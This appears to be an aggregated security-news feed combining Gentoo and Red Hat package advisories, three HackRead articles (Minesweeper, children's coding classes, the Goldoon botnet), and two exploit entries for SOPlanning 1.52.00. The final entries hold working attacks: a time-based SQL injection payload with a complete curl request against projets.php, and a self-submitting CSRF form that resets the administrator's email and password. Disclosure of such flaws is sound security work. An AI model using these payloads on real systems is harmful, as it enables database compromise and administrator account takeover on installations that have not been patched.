Gentoo Linux Security Advisory 202405-4 - Multiple vulnerabilities have been discovered in systemd, the worst of which can lead to a denial of service. Versions greater than or equal to 252.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: systemd: Multiple Vulnerabilities  
     Date: May 04, 2024  
     Bugs: #882769, #887581  
       ID: 202405-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in systemd, the worst of  
which can lead to a denial of service.

Background  
==========

A system and service manager.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
sys-apps/systemd  < 252.4       >= 252.4

Description  
===========

Multiple vulnerabilities have been discovered in systemd. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All systemd users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/systemd-252.4"

References  
==========

[ 1 ] CVE-2022-4415  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4415  
[ 2 ] CVE-2022-45873  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45873

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-04

Gentoo Linux Security Advisory 202405-3 - A vulnerability has been discovered in Dalli, which can lead to code injection. Versions greater than or equal to 3.2.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Dalli: Code Injection  
     Date: May 04, 2024  
     Bugs: #882077  
       ID: 202405-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Dalli, which can lead to code  
injection.

Background  
==========

Dalli is a high performance pure Ruby client for accessing memcached  
servers.

Affected packages  
=================

Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
dev-ruby/dalli  < 3.2.3       >= 3.2.3

Description  
===========

A vulnerability was found in Dalli. Affected is the function  
self.meta_set of the file lib/dalli/protocol/meta/request_formatter.rb  
of the component Meta Protocol Handler. The manipulation leads to  
injection.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Dalli users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-ruby/dalli-3.2.3"

References  
==========

[ 1 ] CVE-2022-4064  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4064

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-03

Red Hat Security Advisory 2024-2700-03 - An update for varnish is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2700.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: varnish security updateAdvisory ID:        RHSA-2024:2700-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2700Issue date:         2024-05-06Revision:           03CVE Names:          CVE-2024-30156====================================================================Summary: An update for varnish is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.Security Fix(es):* varnish: HTTP/2 Broken Window Attack may result in denial of service (CVE-2024-30156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-30156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2271486

Red Hat Security Advisory 2024-2700-03

Red Hat Security Advisory 2024-2699-03 - An update for git-lfs is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2699.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: git-lfs security updateAdvisory ID:        RHSA-2024:2699-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2699Issue date:         2024-05-06Revision:           03CVE Names:          CVE-2023-45288====================================================================Summary: An update for git-lfs is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server.Security Fix(es):* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS (CVE-2023-45288,VU#421644.3)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45288References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2268273

Red Hat Security Advisory 2024-2699-03

Gentoo Linux Security Advisory 202405-2 - Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. Versions greater than or equal to 6.9.13.0 are affected.

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gentoo Linux Security Advisory                           GLSA 202405-02- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                                           https://security.gentoo.org/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High    Title: ImageMagick: Multiple Vulnerabilities     Date: May 04, 2024     Bugs: #835931, #843833, #852947, #871954, #893526, #904357, #908082, #917594       ID: 202405-02- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Synopsis========Multiple vulnerabilities have been discovered in ImageMagick, the worstof which can lead to remote code execution.Background==========ImageMagick is a software suite to create, edit, and compose bitmapimages, that can also read, write, and convert images in many otherformats.Affected packages=================Package                Vulnerable    Unaffected---------------------  ------------  ------------media-gfx/imagemagick  < 6.9.12.88   >= 6.9.13.0Description===========Multiple vulnerabilities have been discovered in ImageMagick. Pleasereview the CVE identifiers referenced below for details.Impact======Please review the referenced CVE identifiers for details.Workaround==========There is no known workaround at this time.Resolution==========All ImageMagick 6.x users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=media-gfx/imagemagick-6.9.13.0" =media-gfx/imagemagick-6*"All ImageMagick 7.x users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=media-gfx/imagemagick-7.1.1.22"References==========[ 1 ] CVE-2021-4219      https://nvd.nist.gov/vuln/detail/CVE-2021-4219[ 2 ] CVE-2021-20224      https://nvd.nist.gov/vuln/detail/CVE-2021-20224[ 3 ] CVE-2022-0284      https://nvd.nist.gov/vuln/detail/CVE-2022-0284[ 4 ] CVE-2022-1115      https://nvd.nist.gov/vuln/detail/CVE-2022-1115[ 5 ] CVE-2022-2719      https://nvd.nist.gov/vuln/detail/CVE-2022-2719[ 6 ] CVE-2022-3213      https://nvd.nist.gov/vuln/detail/CVE-2022-3213[ 7 ] CVE-2022-28463      https://nvd.nist.gov/vuln/detail/CVE-2022-28463[ 8 ] CVE-2022-32545      https://nvd.nist.gov/vuln/detail/CVE-2022-32545[ 9 ] CVE-2022-32546      https://nvd.nist.gov/vuln/detail/CVE-2022-32546[ 10 ] CVE-2022-32547      https://nvd.nist.gov/vuln/detail/CVE-2022-32547[ 11 ] CVE-2022-44267      https://nvd.nist.gov/vuln/detail/CVE-2022-44267[ 12 ] CVE-2022-44268      https://nvd.nist.gov/vuln/detail/CVE-2022-44268[ 13 ] CVE-2023-1906      https://nvd.nist.gov/vuln/detail/CVE-2023-1906[ 14 ] CVE-2023-2157      https://nvd.nist.gov/vuln/detail/CVE-2023-2157[ 15 ] CVE-2023-5341      https://nvd.nist.gov/vuln/detail/CVE-2023-5341[ 16 ] CVE-2023-34151      https://nvd.nist.gov/vuln/detail/CVE-2023-34151[ 17 ] CVE-2023-34153      https://nvd.nist.gov/vuln/detail/CVE-2023-34153Availability============This GLSA and any updates to it are available for viewing atthe Gentoo Security Website: https://security.gentoo.org/glsa/202405-02Concerns?=========Security is a primary focus of Gentoo Linux and ensuring theconfidentiality and security of our users' machines is of utmostimportance to us. Any security concerns should be addressed tosecurity@gentoo.org or alternatively, you may file a bug athttps://bugs.gentoo.org.License=======Copyright 2024 Gentoo Foundation, Inc; referenced textbelongs to its owner(s).The contents of this document are licensed under theCreative Commons - Attribution / Share Alike license.https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-02

By Uzair Amir
Remember Minesweeper? It's not just a game - it's a hidden training ground for work skills! Sharpen your decision-making, focus, and strategic thinking with every click.
This is a post from HackRead.com Read the original post: A Mind at Play: Rediscovering Minesweeper in the Professional Arena

Do you remember the first time you stumbled upon Minesweeper online? It could be during a lazy afternoon at a school computer lab or a quick break at your first job. Something about that grid of grey squares beckons like a puzzle waiting to be solved—a momentary escape that, surprisingly, could be one of your best tools for professional growth today.

****The Puzzle of Decision-Making****

Imagine you’re back in that chair, the mouse under your fingertips. Each click in Minesweeper isn’t just a guess; it’s a decision with risks and rewards that are not unlike the choices you face in your career.

Like navigating through a particularly tricky business dilemma, each square you uncover on the Minesweeper grid teaches you more about the landscape, helping you make the next decision more informed. It’s a dance of logic and anticipation—skills that, when refined, translate into a sharp acumen for analyzing complex professional scenarios.

Remember that feeling when you correctly predict a mine’s location? That’s your analytical skills growing more strong, one click at a time.

****A Masterclass in Focus****

Now, think about the intense concentration Minesweeper demands. Each square could mean triumph or game over, akin to the high stakes of missing a critical detail in a client report or a coding error in a software launch.

This game hones your ability to focus and pay attention to the minutiae—skills that elevate the quality of your work and your productivity. The game’s grid challenges you to spot inconsistencies and patterns, just as in a complex dataset or a crucial project blueprint.

****Strategizing Several Steps Ahead****

Strategic foresight in Minesweeper involves planning several moves, assessing potential outcomes, and managing risks—essential for effective project management and long-term planning in the professional realm. Playing Minesweeper cultivates a mindset that values strategic preparation and adaptability, preparing you to steer projects and negotiations toward success.

****Unwind and Adapt****

Beyond sharpening your technical skills, Minesweeper is a refuge from the daily grind. The familiar grid offers a structured yet soothing distraction that can help clear your mind, akin to meditation. It’s not just about escaping stress but about adapting to it and managing it—key for sustaining performance during crunch times at work.

Moreover, the mental flexibility needed to toggle between strategies in the game mirrors the rapid switching between tasks that’s common in today’s workplace, enhancing your cognitive agility.

****Ready at Your Fingertips****

One of the most significant benefits of Minesweeper is its accessibility. Whether you have a ten-minute break or just a few moments between meetings, it can engage your brain without a substantial time investment. These short bursts of cognitive exercise can strengthen mental agility, fostering a strong cognitive reserve that enhances career longevity and success.

****Conclusion: More Than Just a Game****

As you integrate Minesweeper into your daily routine, you’ll find it’s more than nostalgic play; it’s a deliberate practice in cognitive enhancement. Each game is a step towards becoming a sharper, more attentive, and strategic professional. So, next time you need a break, consider spending it with Minesweeper—not just for fun but also for your professional development.

Rediscovering Minesweeper in this light might change how you view every click—as clearing mines and planting seeds for a more robust professional future.

1.  4 Best War Games You Should Play
2.  12 Classic Games You Can Play on Your Smartphone
3.  The Best FPS Games on Android: Popular by Demand
4.  5 Casual Games You Can Play on Your Mobile Browser Now
5.  Run Windows 95 on your Mac, Linux and Windows 10 devices

A Mind at Play: Rediscovering Minesweeper in the Professional Arena

By Uzair Amir
Is your coding class engaging and effective? Learn what makes the best online coding classes for kids fun, effective, and future-proof!
This is a post from HackRead.com Read the original post: A Checklist for What Every Online Coding Class for Kids Needs

Parents everywhere are eager to sign up their kids for online coding classes to ensure they’re ready for life and the workforce of the future. Nobody can say with 100% accuracy what the future will hold, but surely, in our digital society, it will be high-tech!

How can parents know which online coding classes are better than others? Here’s a checklist that outlines what the best coding classes offer.

****1\. Fun and Video Games Above All****

Parents want their kids to learn to code online, but having fun after school is even more important. The best coding programs embed games into their classes by teaching kids how to design and program their own video games, ones they can play afterwards with friends and family.

Parents and teachers won’t have to push kids very hard to learn when the goal is something they’re so hungry to achieve. Gamification dynamics make learning as addictive and engaging as playing video games.

****2\. Small Classes****

Some coding programs claim to teach STEM skills and everything kids will need to know in the future, but they’re overly packed with students, making for a distractive environment where learning is difficult. Students shouldn’t have to deal with busy teachers who are more concerned with classroom management than teaching.

The best coding courses limit sessions to four students per class, so every child gets their teacher’s full attention.

****3\. Leading Coding Languages****

Avoid the coding classes that rely too heavily on programs like Scratch, which is more of a drag-and-drop program designed to give kids a sense of what coding is like rather than a proper coding language employers look for in prospective employees. Nobody uses Scratch in the field to make video games, apps, or websites.

Instead, look for a program that teaches kids the popular, in-demand coding languages, such as:

*   C#
*   C++
*   Java
*   Python
*   JavaScript

The classes should be engaging for young students who are brand new to coding but never overwhelming. As students develop and hone their skills within each language, they progress to the next until they develop confidence and expertise in that language, too.

****4\. Expert Teachers****

Finally, the leading coding courses hire computer science and computer engineering students who also grew up playing video games to pass on their knowledge to the next generation. Such an approach has multiple benefits.

Kids should learn how to code games from teachers who also played computer games growing up and have the expertise and domain knowledge. Practically speaking, high school students have the perfect resources to speak to about the coding jobs available and where else programming can take them after school when their teachers are also navigating the same situation.

Every computer-related program for kids promises to give a strong foundation in STEM skills, but they’re not all the same in quality. Before signing up your child for an after-school coding course, you should know how to recognize a red flag or the signs of a great coding program when you see them.

1.  1 in 5 Youth Engage in Cybercrime, NCA Finds
2.  Kids breach and bypass Linux Mint screensaver lock
3.  9 risky apps you must monitor on your kids’ smartphone

A Checklist for What Every Online Coding Class for Kids Needs

By Waqas
A new botnet called Goldoon targets D-Link routers and NAS devices putting them at risk of DDoS attacks and more. Learn how weak credentials leave you vulnerable and how to secure your network. pen_spark
This is a post from HackRead.com Read the original post: New Goldoon Botnet Targeting D-Link Devices by Exploiting 9-Year-Old Flaw

Cybersecurity researchers at Fortinet’s FortiGuard Labs have uncovered a new botnet threat dubbed “Goldoon” specifically targeting D-Link routers and network-attached storage (NAS) devices. This malware infects devices by exploiting the CVE-2015-2051 (CVSS score: 10.0) vulnerability, potentially putting user data and network security at risk.

It’s noteworthy to mention that CVE-2015-2051, a security vulnerability identified in February 2015, is nearly a decade old. This vulnerability primarily affects end-of-life devices.

In September 2022, Palo Alto Networks’ Unit 42 discovered that the same vulnerability was being exploited by the infamous Mirai botnet’s variant, known as MooBot, targeting D-Link devices. D-Link addressed the issue in 2015, and further details regarding their response can be found here.

According to the Fortinet report, Goldoon leverages brute-force attacks to gain access to D-Link devices. Brute-force attacks involve systematically trying different username and password combinations until gaining unauthorized access. The report suggests these attacks exploit weak default credentials or outdated firmware on targeted devices.

Once established, Goldoon transforms the infected device into a bot, adding it to a network of compromised machines under the control of the botnet operator. This network of bots can then be used for various malicious activities, including:

*   **Launching Distributed Denial-of-Service (DDoS) attacks:** Bombarding websites or online services with overwhelming traffic, causing them to crash or become unavailable to legitimate users.
*   **Data theft:** Stealing sensitive information like login credentials, financial details, or personal data stored on the infected device.
*   **Spreading malware:** Using the compromised device to propagate malware across a network further, potentially infecting other devices.

The report highlights the critical role of patching and updating firmware on D-Link devices. Outdated firmware often contains vulnerabilities that attackers can exploit. Fortinet recommends D-Link users to:

*   **Enable automatic firmware updates:** Most devices can download and install security updates automatically.
*   **Change default credentials:** Replace the factory-set username and password with a strong, unique combination.
*   **Implement strong network security practices:** Enable firewalls, use complex passwords, and be cautious when clicking on links or opening attachments from unknown senders.

> _“While CVE-2015-2051 is not a new vulnerability and presents a low attack complexity, it has a critical security impact that can lead to remote code execution. Once attackers successfully exploit this vulnerability, they can incorporate compromised devices into their botnet to launch further attacks We strongly recommend applying patches and updates whenever possible because of the ongoing development and introduction of new botnets.”_
> 
> FortiGuard Labs

Fortinet’s discovery of Goldoon serves as a reminder of the evolving cyber threat landscape. By prioritizing proper device security measures, D-Link users can minimize the risk of falling victim to this or similar botnet attacks.

1.  Androxgh0st Malware Hacks Servers for Botnet Attack
2.  Russian Hackers Target Ubiquiti Routers for Botnet Creation
3.  Qakbot Botnet Disrupted, Infected 700,000 Computers Globally
4.  Ddostf Botnet Resurfaces in DDoS Attacks Against Docker Hosts
5.  Mirai’s NoaBot Botnet Targeting Linux Systems with Cryptominer

New Goldoon Botnet Targeting D-Link Devices by Exploiting 9-Year-Old Flaw

SOPlanning version 1.52.00 suffers from a remote SQL injection vulnerability in projects.php.

    Exploit Title: SOPlanning v1.52.00 'projets.php' SQLiApplication: SOPlanningVersion: 1.52.00Date: 4/22/24Exploit Author: Joseph McPeters (Liquidsky)Vendor Homepage: https://www.soplanning.org/en/Software Link: https://sourceforge.net/projects/soplanning/Tested on: LinuxCVE: Not yet assignedDescription: SOPlanning v1.52.00 is vulnerable to Authenticated SQL Injection via the 'projects.php' page.Instructions: Authenticate to the host, the credentials can be obtained using a CSRF exploit (more info included). Once valid credentials are obtained use either a GET/POST request to send the valid parameters that equal to valid SQLi.Vulnerable request parameters for request to "/www/projets.php":filtreGroupeProjet=1&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&rechercheProjet=testThe above parameters can be sent as either a valid GET/POST request to trigger the SQLi.Example Curl Request To Re-Test SQLi:curl -i -s -k -X $'POST' \    -H $'Host: 127.0.0.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://127.0.0.1<http://127.0.0.1/>' -H $'Connection: close' -H $'Referer: http://127.0.0.1/soplanning/www/projets.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' \    -b $'dateDebut=23/04/2024; dateFin=23/06/2024; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; yposProjets=33; PHPSESSID=ovpbclvbc87uh7anfbq2luf9bi; soplanningplanning_=hhrtf0rgs562vm8rhn5i641481; baseLigne=users; baseColonne=jours; afficherTableauRecap=1; masquerLigneVide=0; statut_projet=%5B%22abort%22%2C%22archive%22%2C%22done%22%2C%22progress%22%2C%22todo%22%5D' \    --data-binary $'filtreGroupeProjet=1&statut[]=todo\'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+\'Liquidsky\'=\'Liquidsky&rechercheProjet=test' \    $'http://127.0.0.1/soplanning/www/projets.php'  Note: Cookies need to be authenticated and request needs to be valid for valid SQLi. This curl request can be used with a proxy to reconstruct a valid request.

SOPlanning 1.52.00 SQL Injection

SOPlanning version 1.52.00 suffers from a cross site request forgery vulnerability in xajax_server.php.

<html>  <body>    <form action=https://fuzzlove.website/www/process/xajax_server.php method="POST">      <input type="hidden" name="xajax" value="submitFormProfil" />      <input type="hidden" name="xajaxr" value="" />      <input type="hidden" name="xajaxargs[]" value="ADM" />      <input type="hidden" name="xajaxargs[]" value=pwn@mail.lv<mailto:pwn@mail.lv> />      <input type="hidden" name="xajaxargs[]" value="password" />      <input type="hidden" name="xajaxargs[]" value="fr" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="false" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="false" />      <input type="hidden" name="xajaxargs[]" value="0" />      <input type="hidden" name="xajaxargs[]" value="1" />    </form>    <script>      document.forms[0].submit();    </script>  </body></html>

Tag

#linux